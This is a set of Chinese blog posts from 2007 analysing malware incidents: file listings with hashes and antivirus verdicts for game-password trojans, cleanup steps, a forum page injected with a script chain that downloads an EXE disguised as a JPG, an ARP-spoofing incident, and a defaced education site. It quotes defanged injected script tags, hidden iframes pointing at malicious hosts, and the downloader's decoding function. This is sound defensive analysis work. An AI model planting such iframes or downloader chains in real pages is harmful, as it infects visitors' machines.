大小 : 14848 字节 14.512 KB
MD5 : 7eed3cc661cdb28a9faf8f3578a72f28

Kaspersky 报为Trojan-PSW.Win32.OnLineGames.rt，瑞星 报为Trojan.PSW.OnlineGames.bhm

文件说明符 : C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\upxdnd.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-16 10:14:6
修改时间 : 2007-5-16 10:14:8
访问时间 : 2007-5-22 0:0:0
大小 : 18944 字节 18.512 KB
MD5 : f4ab45ae2671f6bd9d85d957e3a198d2

Kaspersky 报为Trojan-PSW.Win32.OnLineGames.qh，瑞星 报为Trojan.PSW.OnlineGames.big

文件说明符 : C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\upxdnd.dll
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-16 10:14:7
修改时间 : 2007-5-22 8:56:20
访问时间 : 2007-5-22 0:0:0
大小 : 12288 字节 12.0 KB
MD5 : e125ffbd86f5cb2844de79f09ddfedc0

Kaspersky 报为Trojan-PSW.Win32.OnLineGames.qh，瑞星 报为Trojan.PSW.OnlineGames.big

文件说明符 : C:\WINDOWS\system32\wgptl.dll
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2004-8-17 12:0:0
修改时间 : 2004-8-17 12:0:0
访问时间 : 2007-5-22 0:0:0
大小 : 17739 字节 17.331 KB
MD5 : 4716f549e9789dfc2f903ba9719b0807

文件说明符 : C:\WINDOWS\system32\wtrmm.dll
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2004-8-17 12:0:0
修改时间 : 2004-8-17 12:0:0
访问时间 : 2007-5-22 0:0:0
大小 : 17739 字节 17.331 KB
MD5 : 4716f549e9789dfc2f903ba9719b0807

文件说明符 : C:\WINDOWS\system32\hreax.dll
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2004-8-17 12:0:0
修改时间 : 2004-8-17 12:0:0
访问时间 : 2007-5-22 0:0:0
大小 : 17739 字节 17.331 KB
MD5 : 4716f549e9789dfc2f903ba9719b0807

文件说明符 : C:\WINDOWS\system32\1.1
属性 : -SHR
获取文件版本信息大小失败!
创建时间 : n
修改时间 : n
访问时间 : n
大小 : 失败!
MD5 : d41d8cd98f00b204e9800998ecf8427e

Kaspersky 报为Trojan.Win32.Agent.aac，瑞星 报为Trojan.Mnless.luq

文件说明符 : C:\WINDOWS\system32\nwizqjsj.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-16 10:14:8
修改时间 : 2007-5-18 7:46:14
访问时间 : 2007-5-22 0:0:0
大小 : 8192 字节 8.0 KB
MD5 : 6921e0c6573d41ab4987c4c9bb58806b

Kaspersky 报为Trojan-PSW.Win32.OnLineGames.rc，瑞星 报为Trojan.PSW.SunOnline.j

文件说明符 : C:\WINDOWS\system32\nwizqjsj.dll
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-16 10:14:10
修改时间 : 2007-5-18 7:46:16
访问时间 : 2007-5-22 0:0:0
大小 : 8704 字节 8.512 KB
MD5 : 4318c362f4f100c62ee39e9a29aca23e

Kaspersky 报为Trojan-PSW.Win32.OnLineGames.rc，瑞星 报为Trojan.PSW.SunOnline.j

文件说明符 : C:\WINDOWS\system32\TALSZG.dll
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2004-8-17 12:0:0
修改时间 : 2004-8-17 12:0:0
访问时间 : 2007-5-22 0:0:0
大小 : 76102 字节 74.326 KB
MD5 : 53cf7fef1871e74240f1d3b063872a67

Kaspersky 报为Trojan.Win32.Registrator.e，Dr.Web 报为BackDoor.Pigeon.1604

文件说明符 : C:\WINDOWS\system32\pdkpri.dll
属性 : -SH-
获取文件版本信息大小失败!
创建时间 : 2004-8-4 10:14:22
修改时间 : 2004-8-4 10:14:24
访问时间 : 2007-5-22 0:0:0
大小 : 29696 字节 29.0 KB
MD5 : 20a6e67b102439252b48834ae7de0f70

Kaspersky 报为Trojan-Spy.Win32.Delf.uv，瑞星 报为Trojan.PSW.QQHX.bm

文件说明符 : C:\WINDOWS\system32\msacn.dll
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2004-8-17 12:0:0
修改时间 : 2004-8-17 12:0:0
访问时间 : 2007-5-22 0:0:0
大小 : 17739 字节 17.331 KB
MD5 : 4716f549e9789dfc2f903ba9719b0807

文件说明符 : C:\WINDOWS\system32\servet.exe
属性 : -SH-
获取文件版本信息大小失败!
创建时间 : 2007-5-10 10:14:56
修改时间 : 2007-5-15 18:34:52
访问时间 : 2007-5-22 0:0:0
大小 : 16619 字节 16.235 KB
MD5 : 8d6d52f0c8df09526d20290874ef2b38

文件说明符 : C:\WINDOWS\system32\drivers\scvhost.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-16 10:14:27
修改时间 : 2007-5-22 8:56:22
访问时间 : 2007-5-22 0:0:0
大小 : 11081 字节 10.841 KB
MD5 : 059725b53772a916f11e27517edb6bf0

Kaspersky 报为Backdoor.Win32.Delf.awy，瑞星 报为Trojan.Spy.Agent.dcq

文件说明符 : C:\Program Files\QQ2006\q.dll
属性 : ASHR
获取文件版本信息大小失败!
创建时间 : 2007-5-17 10:3:35
修改时间 : 2007-5-17 7:23:50
访问时间 : 2007-5-22 0:0:0
大小 : 42929 字节 41.945 KB
MD5 : d1188636fe939be614aa1b453f7bd199

Dr.Web 报为 BackDoor.Pigeon.46

文件说明符 : C:\WINDOWS\system32\drivers\svchost.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-16 10:14:25
修改时间 : 2007-5-18 7:46:24
访问时间 : 2007-5-22 0:0:0
大小 : 196608 字节 192.0 KB
MD5 : d081a24e65eef068dadf10354d31296b

Kaspersky 报为Backdoor.Win32.Delf.awy，瑞星 报为Trojan.Mnless.lpi

文件说明符 : C:\WINDOWS\system32\SPOOLVS.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-10 18:5:23
修改时间 : 2007-5-14 7:56:44
访问时间 : 2007-5-22 0:0:0
大小 : 13824 字节 13.512 KB
MD5 : 03c0f13cdcdd01f83a7e8473d674487f

Kaspersky 报为Trojan-PSW.Win32.OnLineGames.qw，Dr.Web 报为Trojan.PWS.Wsgame，瑞星 报为Trojan.PSW.RocOnline.bcp

文件说明符 : C:\WINDOWS\system32\AVG.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-10 10:15:3
修改时间 : 2007-5-15 7:26:30
访问时间 : 2007-5-22 0:0:0
大小 : 18432 字节 18.0 KB
MD5 : 48efdfaf7b0170a86a835b90f81bbf89

Kaspersky 报为Trojan-PSW.Win32.OnLineGames.nb，Dr.Web 报为Trojan.PWS.Wsgame，瑞星 报为Trojan.PSW.OnlineGames.ban

文件说明符 : C:\WINDOWS\system32\CFTMON.exe（endurer注：不是CTFMON.exe！）
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-10 10:15:25
修改时间 : 2007-5-15 7:26:32
访问时间 : 2007-5-22 0:0:0
大小 : 18432 字节 18.0 KB
MD5 : fcc4badc9fc99a3c0f8fe3b7ddb4fa10

文件说明符 : C:\WINDOWS\system32\INETINF.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-10 10:15:28
修改时间 : 2007-5-15 7:26:48
访问时间 : 2007-5-22 0:0:0
大小 : 19456 字节 19.0 KB
MD5 : db6bd9e42944b340435c44db6fd2e9f7

Kaspersky 报为Trojan-PSW.Win32.OnLineGames.sx，瑞星 报为Trojan.PSW.OnlineGames.bkm

文件说明符 : C:\WINDOWS\system32\LSASSS.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-10 18:4:57
修改时间 : 2007-5-15 7:27:2
访问时间 : 2007-5-22 0:0:0
大小 : 21504 字节 21.0 KB
MD5 : 4639d05843048b12735c2114f457db6c

Kaspersky 报为Trojan-PSW.Win32.OnLineGames.fb，瑞星 报为Trojan.PSW.OnlineGames.bek

文件说明符 : C:\WINDOWS\system32\SOUND.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-10 18:5:12
修改时间 : 2007-5-15 7:27:4
访问时间 : 2007-5-22 0:0:0
大小 : 12288 字节 12.0 KB
MD5 : ccc9dc92f988828c26de38d5a8115851

Kaspersky 报为Trojan-PSW.Win32.OnLineGames.es，Dr.Web 报为Trojan.PWS.Wsgame，瑞星 报为Trojan.PSW.OnlineGames.azv

文件说明符 : C:\WINDOWS\system32\SVCHOTS.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-10 18:5:14
修改时间 : 2007-5-15 7:27:4
访问时间 : 2007-5-22 0:0:0
大小 : 17408 字节 17.0 KB
MD5 : ad076e1844b66158a53068f63c18bd41

Kaspersky 报为Trojan-PSW.Win32.OnLineGames.nb，瑞星 报为Trojan.PSW.OnlineGames.bgg

文件说明符 : C:\WINDOWS\system32\ALP.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-10 18:5:16
修改时间 : 2007-5-15 7:27:4
访问时间 : 2007-5-22 0:0:0
大小 : 7020 字节 6.876 KB
MD5 : 524d69a1141341a61635312d67ad22d8

Kaspersky 报为Trojan-PSW.Win32.WOW.qp，Dr.Web 报为Trojan.PWS.Wsgame，瑞星 报为Trojan.PSW.OnlineGames.bbb

文件说明符 : C:\WINDOWS\system32\DATSC.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-10 18:5:19
修改时间 : 2007-5-15 7:27:18
访问时间 : 2007-5-22 0:0:0
大小 : 17920 字节 17.512 KB
MD5 : f1a40a9fa4ffcb376e9fbcf0a74b0b56

Kaspersky 报为Trojan-PSW.Win32.OnLineGames.es，Dr.Web 报为Trojan.PWS.Wsgame，瑞星 报为Trojan.PSW.OnlineGames.bbg

文件说明符 : C:\WINDOWS\system32\MSTCS.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 5.1.2600.0
说明 : Microsoft Wisin Control
版权 : Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 5.1.2600.0
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : wisin
源文件名 : Wisin.exe
创建时间 : 2007-5-10 18:5:27
修改时间 : 2007-5-15 7:27:22
访问时间 : 2007-5-22 0:0:0
大小 : 25357 字节 24.781 KB
MD5 : abf8b9249508a8a7d82bb1c0eca6f5a7

Kaspersky 报为Trojan-Downloader.Win32.Small.czl，Dr.Web 报为BackDoor.Twin，瑞星 报为Trojan.DL.Small.vcz

文件说明符 : C:\WINDOWS\system32\ADOBESVC.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-15 7:27:23
修改时间 : 2007-5-15 7:27:24
访问时间 : 2007-5-22 0:0:0
大小 : 13312 字节 13.0 KB
MD5 : 129275b9e3055f0e2caf78371b6cb42b

Kaspersky 报为Trojan-PSW.Win32.OnLineGames.es，瑞星 报为Trojan.PSW.OnlineGames.bbn

文件说明符 : C:\WINDOWS\system32\servet.exe
属性 : -SH-
获取文件版本信息大小失败!
创建时间 : 2007-5-10 10:14:56
修改时间 : 2007-5-15 18:34:52
访问时间 : 2007-5-22 0:0:0
大小 : 16619 字节 16.235 KB
MD5 : 8d6d52f0c8df09526d20290874ef2b38

文件说明符 : C:\WINDOWS\system32\000.exe
属性 : -SH-
获取文件版本信息大小失败!
创建时间 : 2007-5-16 10:13:31
修改时间 : 2007-5-16 10:13:30
访问时间 : 2007-5-22 0:0:0
大小 : 16652 字节 16.268 KB
MD5 : 07c7128add5aed0197d66a15a59960d7

AVP报为 Trojan-Downloader.Win32.Delf.bjy，瑞星报为 Trojan.DL.Small.vax

文件说明符 : C:\WINDOWS\system32\kupini.dll
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-16 10:14:22
修改时间 : 2007-5-16 10:14:24
访问时间 : 2007-5-22 0:0:0
大小 : 142 字节
MD5 : 75e7d1e28eeea0d55199851d09e904d1

文件说明符 : C:\WINDOWS\system32\wpcap.dll
属性 : A---
语言 : 语言中性
文件版本 : 3, 1, 0, 27
说明 : wpcap - Based on libpcap 0.9.3
版权 : Copyright ? 2005 CACE Technologies. Copyright ? 2003-2005 NetGroup, Politecnico di Torino.
备注 :
产品版本 : 3, 1, 0, 27
产品名称 : WinPcap high level library
公司名称 : CACE Technologies
合法商标 :
内部名称 : wpcap
源文件名 : wpcap.dll
创建时间 : 2007-5-16 10:14:24
修改时间 : 2007-5-16 10:14:26
访问时间 : 2007-5-22 0:0:0
大小 : 82512 字节 80.592 KB
MD5 : cc207b8798e1abfacbf33294ac795395

文件说明符 : C:\WINDOWS\system32\Packet.dll
属性 : A---
语言 : 语言中性
文件版本 : 3, 1, 0, 27
说明 : Packet
版权 : Copyright ? 1999-2005 NetGroup, Politecnico di Torino. Copyright ? 2005 CACE Technologies
备注 :
产品版本 : 3, 1, 0, 27
产品名称 : WinPcap low level packet library
公司名称 : CACE Technologies
合法商标 :
内部名称 : Packet
源文件名 : Packet.dll
创建时间 : 2007-5-16 10:14:24
修改时间 : 2007-5-16 10:14:26
访问时间 : 2007-5-22 0:0:0
大小 : 26956 字节 26.332 KB
MD5 : a04f24d9b37898ee9a738ac89f43aeef

文件说明符 : C:\WINDOWS\system32\WanPacket.dll
属性 : A---
语言 : 语言中性
文件版本 : 3, 1, 0, 27
说明 : WanPacket
版权 : Copyright ? 2005 CACE Technologies. Copyright ? 2003-2005 NetGroup, Politecnico di Torino.
备注 :
产品版本 : 3, 1, 0, 27
产品名称 : WinPcap low level NetMon wrapper library
公司名称 : CACE Technologies
合法商标 :
内部名称 : WanPacket
源文件名 : WanPacket.dll
创建时间 : 2007-5-16 10:14:24
修改时间 : 2007-5-16 10:14:26
访问时间 : 2007-5-22 0:0:0
大小 : 21745 字节 21.241 KB
MD5 : ca2b864f5c78393138530773af7a6873

文件说明符 : C:\WINDOWS\system32\SMSSS.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-10 10:15:32
修改时间 : 2007-5-16 10:37:0
访问时间 : 2007-5-22 0:0:0
大小 : 253647 字节 247.719 KB
MD5 : 839f9b8601dd81f7892604c6d794b736

Dr.Web 报为Trojan.PWS.Wsgame
这个文件包中的文件本身并非病毒，只是被病毒利用了。

文件说明符 : C:\WINDOWS\system32\msdebug.dll
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-16 10:14:10
修改时间 : 2007-5-18 7:46:16
访问时间 : 2007-5-22 0:0:0
大小 : 19456 字节 19.0 KB
MD5 : 85bb9146c1a7906b51825d4849fc65b8

Kaspersky 报为Trojan.Win32.Agent.abf，瑞星 报为Trojan.Mnless.lvf

文件说明符 : C:\WINDOWS\system32\until.ttc
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-17 7:23:51
修改时间 : 2007-5-18 7:46:22
访问时间 : 2007-5-22 0:0:0
大小 : 17739 字节 17.331 KB
MD5 : 4716f549e9789dfc2f903ba9719b0807

文件说明符 : C:\WINDOWS\system32\QQ.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-16 10:14:23
修改时间 : 2007-5-18 7:46:24
访问时间 : 2007-5-22 0:0:0
大小 : 196608 字节 192.0 KB
MD5 : d081a24e65eef068dadf10354d31296b

Kaspersky 报为Backdoor.Win32.Delf.awy，瑞星 报为Trojan.Mnless.lpi

文件说明符 : C:\WINDOWS\system32\DOWN.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 1.00
说明 :
版权 :
备注 :
产品版本 : 1.00
产品名称 : 工程1
公司名称 : 2ndSpAcE
合法商标 :
内部名称 : dl
源文件名 : dl.exe
创建时间 : 2007-5-16 10:14:27
修改时间 : 2007-5-18 7:46:26
访问时间 : 2007-5-22 0:0:0
大小 : 11776 字节 11.512 KB
MD5 : b4643ccfcde7c2c57bf9f16701800a73

Kaspersky 报为Trojan-Downloader.Win32.VB.axv，Dr.Web 报为Trojan.DownLoader.10548，瑞星 报为Trojan.DL.VB.nut

文件说明符 : C:\WINDOWS\system32\MY.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-16 10:13:59
修改时间 : 2007-5-18 15:26:48
访问时间 : 2007-5-22 0:0:0
大小 : 22528 字节 22.0 KB
MD5 : 2c8aa101fb7dcb32ccda7acb02e08244

Kaspersky 报为Trojan-Proxy.Win32.Small.du，瑞星 报为Trojan.Proxy.Small.rh

文件说明符 : C:\WINDOWS\system32\RemoteDbg.dll
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-16 10:14:0
修改时间 : 2007-5-18 15:26:48
访问时间 : 2007-5-22 0:0:0
大小 : 18944 字节 18.512 KB
MD5 : c7d92cc4d8a1a03f60b458391eec28b4

文件说明符 : C:\WINDOWS\system32\windhcp.ocx
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-16 10:13:47
修改时间 : 2007-5-21 8:51:20
访问时间 : 2007-5-22 0:0:0
大小 : 20480 字节 20.0 KB
MD5 : 051b0744460d524b88d9233546cb487b

Kaspersky 报为Trojan-Proxy.Win32.Small.du，瑞星 报为Trojan.PSW.OnlineGames.bkf

文件说明符 : C:\WINDOWS\system32\xpdhcp.dll
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-17 7:23:2
修改时间 : 2007-5-21 8:51:42
访问时间 : 2007-5-22 0:0:0
大小 : 18944 字节 18.512 KB
MD5 : 887c741b5edf554b3592e8662053a678

Kaspersky 报为Trojan-Proxy.Win32.Small.du，瑞星 报为Trojan.PSW.Agent.jxp

文件说明符 : C:\WINDOWS\system32\javavmj.dll
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-14 7:57:18
修改时间 : 2007-5-22 8:56:18
访问时间 : 2007-5-22 0:0:0
大小 : 6656 字节 6.512 KB
MD5 : e57d77531398977f8453640c9abdfa1d

Kaspersky 报为Trojan-PSW.Win32.OnLineGames.es，Dr.Web 报为Trojan.Inject.255，瑞星 报为Trojan.PSW.OnlineGames.bbj

文件说明符 : C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\WVQ9YYLV\SPOOLVS[2].exe
属性 : ----
获取文件版本信息大小失败!
创建时间 : 2007-5-14 7:56:41
修改时间 : 2007-5-14 7:56:42
访问时间 : 2007-5-22 0:0:0
大小 : 13824 字节 13.512 KB
MD5 : 03c0f13cdcdd01f83a7e8473d674487f

Kaspersky 报为Trojan-PSW.Win32.OnLineGames.qw，Dr.Web 报为Tojan.PWS.Gamania，瑞星 报为Trojan.PSW.RocOnline.bcp

文件说明符 : C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\WVQ9YYLV\CHD[1].exe
属性 : ----
获取文件版本信息大小失败!
创建时间 : 2007-5-17 7:23:43
修改时间 : 2007-5-17 7:23:46
访问时间 : 2007-5-22 0:0:0
大小 : 23040 字节 22.512 KB
MD5 : 3bca9403fa907000bc038af7a406c506

Kaspersky 报为Trojan-Proxy.Win32.Small.du，Dr.Web 报为 Trojan.Havedo，瑞星 报为Trojan.Proxy.Small.rf

文件说明符 : C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\KUG2OAW3\WD[1].exe
属性 : ----
获取文件版本信息大小失败!
创建时间 : 2007-5-17 7:23:47
修改时间 : 2007-5-17 7:23:50
访问时间 : 2007-5-22 0:0:0
大小 : 70163 字节 68.531 KB
MD5 : 6293be30047f29324f96701fe1f76827

Kaspersky 报为Trojan.Win32.Agent.aac，Dr.Web 报为BackDoor.Pigeon.1604，瑞星 报为Trojan.Mnless.luq

c:\windows\system32\bd.dll这个文件因为时间的关系，没有拿到。

然后用Dr.Web CureIt!查杀C盘的一些目录，结果如下：
=================================
Dr.Web(R) Scanner for Windows v4.33.2 (4.33.2.10067)
---------------------------------
c:\windows\javavmj.exe infected with Trojan.PWS.Wsgame - deleted
c:\windows\system32\talszg.dll infected with BackDoor.Pigeon.1604 - will be cured after reboot
c:\windows\temp\avp.exe infected with Trojan.PWS.Wsgame - deleted

C:\Program Files\QQ2006\q.dll infected with BackDoor.Pigeon.46 - deleted

C:\WINDOWS\system32\javavmj.dll infected with Trojan.Inject.255 - will be cured after reboot
C:\WINDOWS\system32\TALSZG.dll infected with BackDoor.Pigeon.1604 - will be cured after reboot
C:\WINDOWS\temp\Kavs0.dll infected with Trojan.PWS.Wsgame - deleted
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\WVQ9YYLV\LSASSS[1].exe infected with Trojan.PWS.Wsgame - deleted
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\WVQ9YYLV\AVG[2].exe infected with Trojan.PWS.Wsgame - deleted
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\WVQ9YYLV\SPOOLVS[1].exe infected with Trojan.PWS.Wsgame - deleted
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\WVQ9YYLV\DATSC[2].exe infected with Trojan.PWS.Wsgame - deleted
>C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\WVQ9YYLV\SPOOLVS[2].exe infected with Trojan.PWS.Gamania - deleted
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\WVQ9YYLV\AVG[1].exe infected with Trojan.PWS.Wsgame - deleted
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\WVQ9YYLV\CHD[1].exe infected with Trojan.Havedo - deleted
>>C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\WVQ9YYLV\DOWN[1].exe infected with Trojan.DownLoader.10548 - deleted
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\KUG2OAW3\CFTMON[1].exe infected with Trojan.PWS.Wsgame - deleted
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\KUG2OAW3\SOUND[1].exe infected with Trojan.PWS.Wsgame - deleted
>C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\KUG2OAW3\MSTCS[1].exe infected with BackDoor.Twin - deleted
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\KUG2OAW3\MH[1].exe infected with Trojan.PWS.Wsgame - deleted
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\KUG2OAW3\WD[1].exe infected with BackDoor.Pigeon.1604 - deleted
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\1EISTLGQ\SVCHOTS[1].exe infected with Trojan.PWS.Wsgame - deleted
>C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\1EISTLGQ\ALP[1].exe infected with Trojan.PWS.Wsgame - deleted
>C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\1EISTLGQ\ALP[2].exe infected with Trojan.PWS.Wsgame - deleted
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\1EISTLGQ\INETINF[1].exe infected with Trojan.PWS.Wsgame - deleted
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\1EISTLGQ\JH[1].exe infected with Trojan.PWS.Wsgame - deleted
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\1EISTLGQ\ZT[1].exe infected with Trojan.PWS.Wsgame - deleted
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OGBOSEF1\ADOBESVC[1].exe infected with Trojan.PWS.Wsgame - deleted
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OGBOSEF1\INETINF[1].exe infected with Trojan.PWS.Wsgame - deleted
>C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OGBOSEF1\MSTCS[1].exe probably infected with BACKDOOR.Trojan
>C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OGBOSEF1\MSTCS[2].exe probably infected with BACKDOOR.Trojan
>C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OGBOSEF1\QJ[1].exe probably infected with MULDROP.Trojan
>>C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OGBOSEF1\QQ[1].exe\data001 infected with Trojan.Sniff
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OGBOSEF1\QQ[1].exe - archive contains infected objects - moved

一些查不出来的用 bat_do.exe 的延时删除功能来解决。

用HijackThis修复O4、O23等项目。

下载安装瑞星卡卡安全助手修复O24等项目。

重启电脑，接上网线测试，打开一些国内网站的网页，检查源代码，没有发现被加入包含病毒网址的代码。

某论坛上挂的东东，JPG图片 or 病毒Trojan.Win32.VB.azc？

endurer 原创
2007-05-17 第1版

前几天，打开某论坛时，Kaspersky报告：已检测 木马程序 Trojan-Downloader.HTML.Agent.df

检查网页发现首部被植入代码：
/---
＜script language＝"javascript" src＝"hxxp://61.146.118.1*1/news***/include/md5.asp?ad＝1"＞＜/script＞
---/

hxxp://61.146.118.1*1/news***/include/md5.asp?ad＝1 的内容为：
/---
document.write（"＜script language＝\"javascript\" src＝\""）;
document.write（"hxxp://www.ha**v**eip.com/d**a.asp\"＞"）;
document.write（"＜/script＞"）;
---/

hxxp://www.ha**v**eip.com/d**a.asp 包含代码：
/---
var ad_str＝"＜script language＝\"javascript\" src＝\"hxxp://www.blogchina.com/resource/upload***/pic***/2006/05/05/wpt**8.js\"＞＜\/script＞"
SetCookie（"my_ad","yes",3600,"/"）;document.write（ad_str）;}
//--＞

hxxp://www.blogchina.com/resource/upload***/pic***/2006/05/05/wpt**8.js 包含JavaScript脚本代码，功能是输出VBScript脚本代码。

输出的VBScript脚本代码的功能是使用自定义解密函数
/---
function r（k）
s＝Split（k,"@"）
t＝""
For i_ ＝ 0 To UBound（s）
t＝t＋Chr（eval（s（i_）））
Next
r＝t
End Function
---/
解密并输出变量t的值。

解密后的变量t的值为 VBScript脚本，功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件wpt8.vbe，保存为 IE临时文件夹下的webpnt.vbe，然后通过 Shell.Application 对象 Q 的 ShellExecute 方法 来运行。

wpt8.vbe 的内容为VBScript脚本，功能是是使用自定义解密函数
/---
function r（k）
s＝Split（k,"@"）
t＝""
For i_ ＝ 0 To UBound（s）
t＝t＋Chr（eval（s（i_）））
Next
r＝t
End Function
---/
解密并执行变量t的值。
解密后的变量t的值为VBScript脚本，功能是利用 Microsoft.XMLHTTP、ADODB.Stream 和 scrīpting.FileSystemObject 下载文件hxxp://11***8.img**.pp**.sohu.com/images/2007/5/11/1***0/24/11***31**1048215.jpg，保存为 IE临时文件夹下的 webpnt.exe，然后通过 Shell.Run 来运行。

文件说明符 : D:\test\11311048215.jpg
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-13 23:30:51
修改时间 : 2007-5-13 23:29:18
访问时间 : 2007-5-13 23:32:51
大小 : 20011 字节 19.555 KB
MD5 : 4ec141d8dc997f5592821a415fc4850f

这个文件开头有JPEG文件信息，但后面内容是PE格式的EXE文件内容。
Kaspersky的病毒分析师的回复：

Hello.

This file is not malicious itself and it wouldn't be detected, but it contains new malware that we detected as Trojan.Win32.VB.azc.
-----------------
Regards, Alexander Romanenko
Virus Analyst, Kaspersky Lab.

ARP病毒“吃里巴外”？

endurer 原创
2007-05-16 第1版

今天上午，我们单位里的电脑，打开国内网站的网页都报病毒

卡巴都报：

/---
已检测到: 恶意程序 Exploit.Win32.IMG-ANI.gen (修改) URL: hxxp://q***.z*px**5**2*0.com/w***.js
---/

瑞星都报发现：Trojan.DL.VBS.Agent.cog、Hack.SuspiciousAni。

检查这些被报含病毒的网页的源代码，发现头部都被加入了代码：
/---
＜iframe src＝'hxxp://www.z*px**5**2*0.com/0***.htm' width=0 height=0＞＜/iframe＞
---/

比国宝自动在网页加代码还利害……

奇怪的是，打开Google等国外的网站就没事……查看这些国外网站的网页的源代码，没有被加入恶意代码……

难道这病毒还“吃里巴外”？

中午认真排查，发现一根网线，一接到交换机上就出现上述问题，此时网关可以正常Ping通；把这根网线拔掉，网关就Ping不通了，需要重启交换机等设备才能恢复正常。

看来这个病毒发作时，使用ARP欺骗技术，把自身所在的电脑伪装为网关，这样局域网中其它电脑与外网的数据交换都要经过它，病毒就可以往网页数据里加入包含恶意网址代码了。

某市河西区教育信息网升级为历代挂马技术展示平台

endurer 原创

2007-05-15 第1版

此前普发现此网被加入传播Worm.Win32.Viking.jr等的代码，可参考：

某市河西区教育信息网被加入传播Worm.Win32.Viking.jr等的代码
http://endurer.bokee.com/6186405.html
http://blog.csdn.net/Purpleendurer/archive/2007/03/26/1542040.aspx
http://blog.sina.com.cn/u/49926d910100082w

刚才去转了一下，发现那里已“升级”成了历代挂马技术展示平台，从加入多余空格、用escape()加密等简单方法，到US-ASCII、ANI漏洞，一应俱全。

在主页末发现代码：
/---
＜iframe src＝"hxxp://w***.q**b*b**d.com/bd***.htm?001" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
＜iframe src＝"hxxp://www.m***m*ju.net/bbs/tj***.htm" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞ ＜iframe src＝"hxxp://idc**.ki*s***163.com/index.html?id＝hagk" width＝"0" height＝"0"＞＜/iframe＞
＜iframe src＝hxxp://www.hao123***hao123*.cn/ok***/index.htm width＝0 height＝0＞＜/iframe＞＜iframe src＝hxxp://www.x**4*5*4**.cn/ width＝100 height＝0 frameborder＝0＞＜/iframe＞＜iframe src＝hxxp://www.x**4*5*4**.cn/ width＝100 height＝0 frameborder＝0＞＜/iframe＞＜iframe src＝hxxp://www.x**4*5*4**.cn/ width＝100 height＝0 frameborder＝0＞＜/iframe＞
